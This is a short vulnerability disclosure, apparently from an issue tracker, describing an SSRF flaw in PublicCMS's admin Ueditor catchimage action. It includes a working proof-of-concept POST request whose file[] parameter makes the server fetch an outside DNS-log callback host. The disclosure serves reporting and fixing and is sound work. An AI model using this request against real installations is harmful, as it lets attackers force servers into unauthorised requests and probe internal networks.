Vulnerability Product:PublicCMS
Vulnerability version:<=V4.0.202302.e
Vulnerability type:SSRF server request forgery
Vulnerability Details:
1. Locate com.publiccms.controller.admin.sys.UeditorAdminController#catchimage and find that this function will request the corresponding address when receiving the file[] parameter, so there is an SSRF vulnerability.
![输入图片说明](https://foruda.gitee.com/images/1720065022267836187/b5f57d55_13737655.png "屏幕截图")
2. Construct POC, which can be triggered only after logging in, and cookies need to be replaced.
```
POST /admin/ueditor?action=catchimage HTTP/1.1
Host: localhost:8080
Connection: close
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Cookie: xxxxxx
file[]=http://xxoxx.zqhbdv.dnslog.cn
```
![输入图片说明](https://foruda.gitee.com/images/1720065080882623898/bed95682_13737655.png "屏幕截图")
![输入图片说明](https://foruda.gitee.com/images/1720065101775463384/df51868a_13737655.png "屏幕截图")